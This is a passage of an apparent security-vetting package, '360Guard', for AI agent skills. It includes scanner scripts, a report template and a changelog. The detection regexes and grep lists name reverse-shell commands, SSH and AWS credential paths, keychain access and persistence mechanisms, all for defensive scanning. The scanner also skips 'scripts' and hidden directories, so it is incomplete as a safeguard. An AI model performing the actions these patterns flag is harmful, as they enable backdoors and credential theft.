    { pattern: /child_process/, name: 'subprocess execution' }
  ],
  MEDIUM: [
    { pattern: /\/\.ssh\//, name: 'SSH directory access' },
    { pattern: /\/\.aws\//, name: 'AWS directory access' },
    { pattern: /keychain/i, name: 'Keychain access' },
    { pattern: /credentials|token|secret/i, name: 'credential related' },
    { pattern: /cron|systemd|launchd/i, name: 'persistence mechanism' }
  ]
};

// Test one file against every pattern; returns findings per risk level
function scanFile(filePath) {
  const results = { CRITICAL: [], HIGH: [], MEDIUM: [] };
  try {
    const content = fs.readFileSync(filePath, 'utf8');
    for (const [level, patterns] of Object.entries(DANGER_PATTERNS)) {
      for (const { pattern, name } of patterns) {
        if (pattern.test(content)) {
          results[level].push({ file: filePath, issue: name });
        }
      }
    }
  } catch (e) {
    // Skip unreadable files
  }
  return results;
}

// Recursively scan script files; directories whose name starts with "." are skipped
function scanDirectory(dirPath) {
  const allResults = { CRITICAL: [], HIGH: [], MEDIUM: [] };
  function walk(dir) {
    const files = fs.readdirSync(dir);
    for (const file of files) {
      const fullPath = path.join(dir, file);
      const stat = fs.statSync(fullPath);
      if (stat.isDirectory() && !file.startsWith('.')) {
        walk(fullPath);
      } else if (stat.isFile()) {
        const ext = path.extname(file);
        if (['.js', '.ts', '.py', '.sh', '.bash'].includes(ext)) {
          const results = scanFile(fullPath);
          for (const level of Object.keys(allResults)) {
            allResults[level].push(...results[level]);
          }
        }
      }
    }
  }
  walk(dirPath);
  return allResults;
}

// Print the report and exit: 1 = critical, 2 = high, 0 = medium or clean
function generateReport(skillPath, results) {
  console.log('\n🛡️ 360Guard Security Scan Report');
  console.log('='.repeat(50));
  console.log(`📂 Scan path: ${skillPath}`);
  console.log('');
  const riskOrder = ['CRITICAL', 'HIGH', 'MEDIUM'];
  const emoji = { CRITICAL: '🔴', HIGH: '⚠️', MEDIUM: '🟡' };
  for (const level of riskOrder) {
    if (results[level].length > 0) {
      console.log(`\n${emoji[level]} ${level} risk (${results[level].length} items):`);
      for (const item of results[level]) {
        console.log(`  • ${item.issue}`);
        console.log(`    File: ${item.file}`);
      }
    }
  }
  console.log('\n' + '='.repeat(50));
  if (results.CRITICAL.length > 0) {
    console.log('🔴 Conclusion: Critical risks found, NOT recommended to install');
    process.exit(1);
  } else if (results.HIGH.length > 0) {
    console.log('⚠️ Conclusion: High risk found, human approval required');
    process.exit(2);
  } else if (results.MEDIUM.length > 0) {
    console.log('🟡 Conclusion: Medium risk found, please review carefully');
    process.exit(0);
  } else {
    console.log('✅ Conclusion: No obvious risks found');
    process.exit(0);
  }
}

// Main
const skillPath = process.argv[2] || '.';
if (!fs.existsSync(skillPath)) {
  console.error('❌ Path does not exist:', skillPath);
  process.exit(1);
}
const stat = fs.statSync(skillPath);
const results = stat.isDirectory() ? scanDirectory(skillPath) : scanFile(skillPath);
generateReport(skillPath, results);
```
---
## 7. Output Format
After vetting, produce this format:
```
╔══════════════════════════════════════════════════════════╗
║ 🛡️ 360Guard Security Review Report ║
╠══════════════════════════════════════════════════════════╣
║ Skill Name: [name] ║
║ Source: [ClawHub / GitHub / other] ║
║ Author: [username] ║
║ Version: [version] ║
╠══════════════════════════════════════════════════════════╣
║ 📊 Scan Statistics ║
║ • File count: [count] ║
║ • Lines of code: [count] ║
║ • Dependencies: [count] ║
╠══════════════════════════════════════════════════════════╣
║ 🚨 Issues Found ║
║ 🔴 Critical: [count] ║
║ ⚠️ High: [count] ║
║ 🟡 Medium: [count] ║
╠══════════════════════════════════════════════════════════╣
║ 📋 Detailed Issue List ║
║ [List each issue with file location, type, risk level] ║
╠══════════════════════════════════════════════════════════╣
║ 💾 Permissions Required ║
║ • File read: [list or "None"] ║
║ • File write: [list or "None"] ║
║ • Network: [list or "None"] ║
║ • Commands: [list or "None"] ║
╠══════════════════════════════════════════════════════════╣
║ 🎯 Risk Level: [🟢 LOW / 🟡 MEDIUM / 🔴 HIGH / ⛔ EXTREME] ║
╠══════════════════════════════════════════════════════════╣
║ ⚖️ Final Verdict ║
║ [✅ Safe to install / ⚠️ Install with caution / ❌ Do not install] ║
╠══════════════════════════════════════════════════════════╣
║ 📝 Notes ║
║ [Any other observations and recommendations] ║
╚══════════════════════════════════════════════════════════╝
```
---
## 8. Quick Commands
### Vet ClawHub Skill
```bash
# Method 1: Download and scan
wget -O skill.zip "https://clawhub.ai/api/download/SKILL_NAME"
unzip skill.zip
node ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/scanner.cjs ./SKILL_NAME
rm -rf skill.zip SKILL_NAME
# Method 2: GitHub repo scan
curl -s "https://api.github.com/repos/OWNER/REPO" | jq '{stars: .stargazers_count, updated: .updated_at}'
git clone https://github.com/OWNER/REPO
node ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/scanner.cjs ./REPO
```
### Quick Vet Commands
```bash
# Check repo stats
curl -s "https://api.github.com/repos/OWNER/REPO" | jq '{stars, forks, updated, language}'
# List all files
curl -s "https://api.github.com/repos/OWNER/REPO/contents/" | jq '.[].name'
# Get SKILL.md
curl -s "https://raw.githubusercontent.com/OWNER/REPO/main/SKILL.md"
```
---
## 9. Remember
- ❌ No Skill is worth compromising security
- ❓ When in doubt, don't install
- 🧑‍🦰 High-risk decisions: ask your human
- 📝 Document your vetting for future reference
- 🔄 Periodically re-vet installed Skills
---
> 🛡️ **360Guard** — 360-degree security for your Agent
FILE:CHANGELOG.md
# 360Guard vs Skill Vetter Comparison Report
> 360Guard is an enhanced version built on top of Skill Vetter
---
## 📊 Overall Comparison
| Dimension | Skill Vetter | 360Guard |
|-----------|--------------|----------|
| **Check Items** | ~15 items | ~50+ items |
| **Risk Levels** | 4 levels | 4 levels + detailed subcategories |
| **Automated Scripts** | None | 3 (Quick/Full/Node.js) |
| **Output Reports** | Manual template | Auto-generated + multiple formats |
| **Supply Chain Checks** | None | Yes |
| **Social Engineering Checks** | None | Yes |
---
## ✅ New Check Items (compared to Vetter)
### 1. Persistence & Auto-start 🔴
- [x] Creates cron job / systemd service
- [x] Modifies ~/.ssh/authorized_keys
- [x] Writes to /etc/hosts
- [x] Adds Login Items / Startup Items
- [x] Modifies .bashrc / .zshrc / profile
- [x] Registers LaunchAgent (macOS)
- [x] Installs systemd user service
### 2. Monitoring & Eavesdropping 🔴
- [x] Screen capture/recording permission
- [x] Audio recording permission
- [x] Keyloggers
- [x] Accesses microphone/camera
- [x] File system monitoring (fswatch/inotify)
### 3. Data & Privacy 🔴
- [x] Reads clipboard
- [x] Reads environment variables (API_/SECRET/TOKEN prefix)
- [x] Accesses browser history/bookmarks
- [x] Accesses macOS Keychain
- [x] Accesses iMessage/SMS
- [x] Accesses contacts/calendar
- [x] Accesses photo library
### 4. Network & Communication 🔴
- [x] Initiates reverse shell
- [x] Uses Tor proxy
- [x] DNS queries to suspicious domains
- [x] WebSocket long connections
- [x] IRC connections
- [x] Non-standard ports
- [x] Hardcoded IP addresses
### 5. Code Execution (Advanced) 🔴
- [x] Dynamic import (importlib.import_module)
- [x] __import__() dynamic loading
- [x] compile() dynamic compilation
- [x] xmlrpc / jsonrpc remote calls
- [x] pickle / yaml / marshal deserialization
- [x] exec() / eval() any string
- [x] subprocess shell=True
### 6. File System 🟡
- [x] Writes to executable paths outside /tmp
- [x] Modifies /usr/local/bin
- [x] Writes .dmg/.pkg installers
- [x] Creates .hidden files/directories
- [x] File permission modification (chmod +x)
- [x] Symbolic links (pointing external)
- [x] Contains binary files
### 7. Dependencies & Supply Chain 🟡
- [x] Dependency version range too wide
- [x] Dependencies from private/unknown sources
- [x] Dependencies on deprecated packages
- [x] Silent additional dependency downloads
- [x] References other unvetted Skills
- [x] Uses git submodule
### 8. Social Engineering 🟡
- [x] Mimics popular Skill names
- [x] README overpromises
- [x] No source code, only compiled binaries
- [x] Author has no history
- [x] Downloads vs stars ratio suspicious
---
## 🛠️ New Automated Features
### 1. Quick Scan (quick-scan.sh)
- Scan dangerous functions
- Scan sensitive paths
- Scan dangerous commands
- Scan persistence mechanisms
### 2. Full Scan (full-scan.sh)
- File structure analysis
- Dangerous function scan
- Sensitive path scan
- Network request scan
- Persistence check
- Dependency check
- Binary file check
- Symbolic link check
### 3. Node.js Scanner (scanner.cjs)
- Multi-language support (JS/TS/Python/Bash)
- Risk level output
- Code line number location
- Code snippet extraction
- Process exit codes (0=safe, 1=critical, 2=high)
---
## 📈 Benefits & Value
### 1. More Comprehensive Coverage
- Vetter has basic checks; 360Guard adds 3x more check items
- Covers advanced attack vectors like persistence, privacy, supply chain
### 2. Higher Automation
- Vetter is manual-only; 360Guard provides 3 automated tools
- Can be integrated into CI/CD or cron jobs
### 3. More Actionable
- 360Guard outputs structured reports for direct decision-making
- Clear exit codes for script integration
### 4. Continuously Evolving
- Modular design, easy to add new check items
- Reserved extension interface
---
## 📋 Output Report Comparison
### Skill Vetter Output
```
SKILL VETTING REPORT
══════════════════════════════════════
RED FLAGS: [None / List them]
RISK LEVEL: [🟢 LOW / 🟡 MEDIUM / 🔴 HIGH / ⛔ EXTREME]
VERDICT: [✅ SAFE / ⚠️ CAUTION / ❌ DO NOT INSTALL]
```
### 360Guard Output
```
🛡️ 360Guard Security Scan Report
══════════════════════════════════════
🔴 CRITICAL risk (X items):
• eval() execution - file.js:42
• Reverse shell - script.sh:15
⚠️ HIGH risk (X items):
• curl request - api.js:10
...
📄 Report saved: 360guard-report-20260313.txt
🔴 Conclusion: Critical risks found, not recommended to install
```
---
## 🎯 Use Cases
| Scenario | Recommended Use |
|----------|-----------------|
| Quick check (< 1 min) | quick-scan.sh |
| Full review (5-10 min) | full-scan.sh |
| Integrated into automation | scanner.cjs |
| Manual review guide | SKILL.md checklist |
---
## 📝 Usage Examples
```bash
# Quick scan
bash ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/quick-scan.sh /path/to/skill
# Full scan
bash ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/full-scan.sh /path/to/skill
# Node.js scan
node ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/scanner.cjs /path/to/skill
# Scan and auto-judge
node ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/scanner.cjs /path/to/skill
echo $? # 0=safe, 1=critical, 2=high
```
---
## 🔄 Version History
- **v1.0.0** (2026-03-13): Initial version
- Built on Skill Vetter
- Added 35+ check items
- Added 3 automated scripts
- Added detailed report output
---
> 🛡️ 360Guard — 360-degree security for your Agent
FILE:scripts/scanner.cjs
#!/usr/bin/env node
/**
* 360Guard Node.js Scanner
* Usage: node scanner.cjs /path/to/skill
*/
const fs = require('fs');
const path = require('path');
// Exclude paths - don't scan these directories
const EXCLUDE_DIRS = ['node_modules', '.git', 'scripts', '__pycache__', '.pytest_cache'];
const DANGER_PATTERNS = {
  CRITICAL: [
    { pattern: /eval\s*\(/, name: 'eval() execution', desc: 'Dynamic code execution' },
    { pattern: /exec\s*\(/, name: 'exec() execution', desc: 'System command execution' },
    { pattern: /shell\s*=\s*true/i, name: 'subprocess shell=True', desc: 'Shell injection risk' },
    { pattern: /base64.*decode/i, name: 'base64 decode', desc: 'Code obfuscation detection' },
    { pattern: /pickle\.load/i, name: 'pickle deserialization', desc: 'Python deserialization vulnerability' },
    { pattern: /yaml\.load/i, name: 'yaml deserialization', desc: 'YAML deserialization risk' },
    { pattern: /__import__\s*\(/, name: 'dynamic import', desc: 'Dynamic module loading' },
    { pattern: /importlib\.import_module/i, name: 'importlib dynamic load', desc: 'Runtime loading' },
    { pattern: /xmlrpc/i, name: 'XML-RPC', desc: 'Remote procedure call' },
    { pattern: /reverse.*shell|nc\s+-e|bash\s+-i/i, name: 'reverse shell', desc: 'Potential backdoor' },
    { pattern: /child_process.*spawn.*shell/i, name: 'shell spawn', desc: 'Command execution' }
  ],
  HIGH: [
    { pattern: /curl\s+['"`]/i, name: 'curl request', desc: 'Network request' },
    { pattern: /wget\s+['"`]/i, name: 'wget download', desc: 'File download' },
    { pattern: /fetch\s*\(/, name: 'fetch request', desc: 'HTTP request' },
    { pattern: /axios\./, name: 'axios request', desc: 'HTTP request' },
    { pattern: /https?:\/\/\d{1,3}\.\d{1,3}/, name: 'direct IP connection', desc: 'Non-domain network request' },
    { pattern: /process\.env/i, name: 'environment variable access', desc: 'Possible credential leak' },
    { pattern: /child_process/, name: 'subprocess', desc: 'System command execution' },
    { pattern: /http\.createServer|express\(\)/i, name: 'create server', desc: 'Local service' }
  ],
  MEDIUM: [
    { pattern: /\/\.ssh\//, name: 'SSH directory', desc: 'Sensitive directory access' },
    { pattern: /\/\.aws\//, name: 'AWS directory', desc: 'Cloud credential directory' },
    { pattern: /keychain/i, name: 'Keychain', desc: 'System keychain' },
    { pattern: /credentials|token|secret|api[_-]?key/i, name: 'credential related', desc: 'Sensitive information' },
    { pattern: /cron|systemd|launchd/i, name: 'persistence mechanism', desc: 'Auto-start on boot' },
    { pattern: /setTimeout|setInterval.*eval/i, name: 'timer eval', desc: 'Dynamic execution' },
    { pattern: /document\.cookie/i, name: 'Cookie access', desc: 'Session hijacking' },
    { pattern: /localStorage|sessionStorage/i, name: 'storage access', desc: 'Data storage' }
  ]
};
function scanFile(filePath) {
  const results = { CRITICAL: [], HIGH: [], MEDIUM: [] };
  try {
    const content = fs.readFileSync(filePath, 'utf8');
    const lines = content.split('\n');
    for (const [level, patterns] of Object.entries(DANGER_PATTERNS)) {
      for (const { pattern, name, desc } of patterns) {
        // Whole-file check first; the per-line pass only runs on a hit
        const matches = content.match(new RegExp(pattern, 'gi'));
        if (matches) {
          lines.forEach((line, idx) => {
            if (pattern.test(line)) {
              results[level].push({
                file: filePath,
                line: idx + 1,
                issue: name,
                desc: desc,
                snippet: line.trim().substring(0, 80)
              });
            }
          });
        }
      }
    }
  } catch (e) {
    // Skip unreadable files
  }
  // Deduplicate: keep only the first hit per (file, issue) pair
  for (const level of Object.keys(results)) {
    results[level] = results[level].filter((v, i, a) =>
      a.findIndex(t => t.file === v.file && t.issue === v.issue) === i
    );
  }
  return results;
}
function scanDirectory(dirPath) {
  const allResults = { CRITICAL: [], HIGH: [], MEDIUM: [] };
  function walk(dir) {
    try {
      const files = fs.readdirSync(dir);
      for (const file of files) {
        // Skip excluded directories
        if (EXCLUDE_DIRS.includes(file) || file.startsWith('.')) continue;
        const fullPath = path.join(dir, file);
        try {
          const stat = fs.statSync(fullPath);
          if (stat.isDirectory()) {
            walk(fullPath);
          } else if (stat.isFile()) {
            const ext = path.extname(file);
            if (['.js', '.ts', '.jsx', '.tsx', '.py', '.sh', '.bash', '.zsh'].includes(ext)) {
              const results = scanFile(fullPath);
              for (const level of Object.keys(allResults)) {
                allResults[level].push(...results[level]);
              }
            }
          }
        } catch (e) {
          // Skip inaccessible files
        }
      }
    } catch (e) {
      // Skip inaccessible directories
    }
  }
  walk(dirPath);
  return allResults;
}
function generateReport(skillPath, results) {
  console.log('\n🛡️ 360Guard Security Scan Report');
  console.log('='.repeat(50));
  console.log(`📂 Scan path: ${skillPath}`);
  console.log(`⏰ Scan time: ${new Date().toISOString()}`);
  console.log('');
  const riskOrder = ['CRITICAL', 'HIGH', 'MEDIUM'];
  const emoji = { CRITICAL: '🔴', HIGH: '⚠️', MEDIUM: '🟡' };
  for (const level of riskOrder) {
    if (results[level].length > 0) {
      console.log(`\n${emoji[level]} ${level} risk (${results[level].length} items):`);
      for (const item of results[level]) {
        console.log(`  • ${item.issue}`);
        console.log(`    Location: ${item.file}:${item.line}`);
        console.log(`    Code: ${item.snippet}...`);
      }
    }
  }
  console.log('\n' + '='.repeat(50));
  // Exit status: 1 = critical, 2 = high, 0 = medium findings only or clean
  if (results.CRITICAL.length > 0) {
    console.log('🔴 Conclusion: Critical risks found, not recommended to install');
    console.log('⚠️ Please stop immediately and delete the Skill');
    process.exit(1);
  } else if (results.HIGH.length > 0) {
    console.log('⚠️ Conclusion: High risk found, human approval required');
    process.exit(2);
  } else if (results.MEDIUM.length > 0) {
    console.log('🟡 Conclusion: Medium risk found, please review carefully before installing');
    process.exit(0);
  } else {
    console.log('✅ Conclusion: No obvious risks found');
    process.exit(0);
  }
}
// Main program
const skillPath = process.argv[2] || '.';
if (!fs.existsSync(skillPath)) {
console.error('❌ Path does not exist:', skillPath);
console.log('Usage: node scanner.cjs /path/to/skill');
process.exit(1);
}
const stat = fs.statSync(skillPath);
const results = stat.isDirectory() ? scanDirectory(skillPath) : scanFile(skillPath);
generateReport(skillPath, results);
FILE:scripts/quick-scan.sh
#!/bin/bash
# 360Guard Quick Scan Script
# Usage: ./quick-scan.sh /path/to/skill
# Output: Quick risk assessment report
# Skill path from the first argument; defaults to the current directory
SKILL_PATH="${1:-.}"
echo "🔍 360Guard Quick Scan: $SKILL_PATH"
echo "================================"
# Check dangerous functions
echo -e "\n📡 Network request check:"
grep -r "curl\|wget\|fetch\|http\.\|https\.\|socket\|request\|axios" "$SKILL_PATH" \
--include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null | head -5
# Check sensitive file access
echo -e "\n🔑 Sensitive path check:"
grep -r "~/.ssh\|~/.aws\|~/.config\|/etc/hosts\|authorized_keys\|keychain\|credentials" "$SKILL_PATH" \
--include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null
# Check dangerous commands
echo -e "\n⚠️ Dangerous command check:"
grep -r "eval\|exec\|shell=True\|base64 -d\|openssl\|subprocess" "$SKILL_PATH" \
--include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null
# Check persistence
echo -e "\n⏰ Persistence check:"
grep -r "cron\|systemd\|launchd\|login item\|autostart\|startup" "$SKILL_PATH" \
--include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null
echo -e "\n✅ Quick scan complete"
FILE:scripts/full-scan.sh
#!/bin/bash
# 360Guard Full Scan Script
# Usage: ./full-scan.sh /path/to/skill
# Skill path from the first argument; defaults to the current directory
SKILL_PATH="${1:-.}"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
REPORT="$SKILL_PATH/360guard-report-$TIMESTAMP.txt"
echo "🛡️ 360Guard Full Scan: $SKILL_PATH"
echo "========================================"
{
  echo "🛡️ 360Guard Complete Security Scan Report"
  echo "========================================"
  echo "Scan time: $(date)"
  echo "Scan path: $SKILL_PATH"
  echo ""
  # 1. File structure check
  echo "📁 File structure:"
  find "$SKILL_PATH" -type f 2>/dev/null | head -30
  echo ""
  # 2. Dangerous function scan
  echo "⚠️ Dangerous function scan:"
  for pattern in "eval(" "exec(" "shell=True" "base64" "subprocess" "importlib" "__import__" "pickle" "yaml.load" "xmlrpc" "socket.create_connection"; do
    result=$(grep -r "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null)
    if [ -n "$result" ]; then
      echo " ❌ Found: $pattern"
    fi
  done
  echo ""
  # 3. Sensitive path scan
  echo "🔑 Sensitive path scan:"
  for pattern in "~/.ssh" "~/.aws" "~/.config" "/etc/hosts" "authorized_keys" "keychain" "credentials" ".env"; do
    result=$(grep -r "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null)
    if [ -n "$result" ]; then
      echo " ⚠️ Warning: $pattern"
    fi
  done
  echo ""
  # 4. Network request scan
  echo "🌐 Network request scan:"
  grep -r "http://\|https://\|wget\|curl\|fetch" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null | grep -v "^#" | head -10
  echo ""
  # 5. Persistence check
  echo "⏰ Persistence check:"
  for pattern in "cron" "systemd" "launchd" "login item" "startup" "autostart"; do
    result=$(grep -ri "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null)
    if [ -n "$result" ]; then
      echo " 🔴 High risk: $pattern"
    fi
  done
  echo ""
  # 6. Dependency check
  echo "📦 Dependency check:"
  [ -f "$SKILL_PATH/package.json" ] && echo " package.json exists" && cat "$SKILL_PATH/package.json" | grep -E "dependencies|devDependencies" -A 20
  [ -f "$SKILL_PATH/requirements.txt" ] && echo " requirements.txt exists" && cat "$SKILL_PATH/requirements.txt"
  echo ""
  # 7. Binary file check
  echo "💾 Binary file check:"
  find "$SKILL_PATH" -type f \( -name "*.so" -o -name "*.dylib" -o -name "*.exe" -o -name "*.bin" -o -name "*.dll" \) 2>/dev/null
  echo ""
  # 8. Symbolic link check
  echo "🔗 Symbolic link check:"
  find "$SKILL_PATH" -type l 2>/dev/null
  echo ""
  echo "========================================"
  echo "✅ Full scan complete"
} | tee "$REPORT"
echo ""
echo "📄 Report saved to: $REPORT"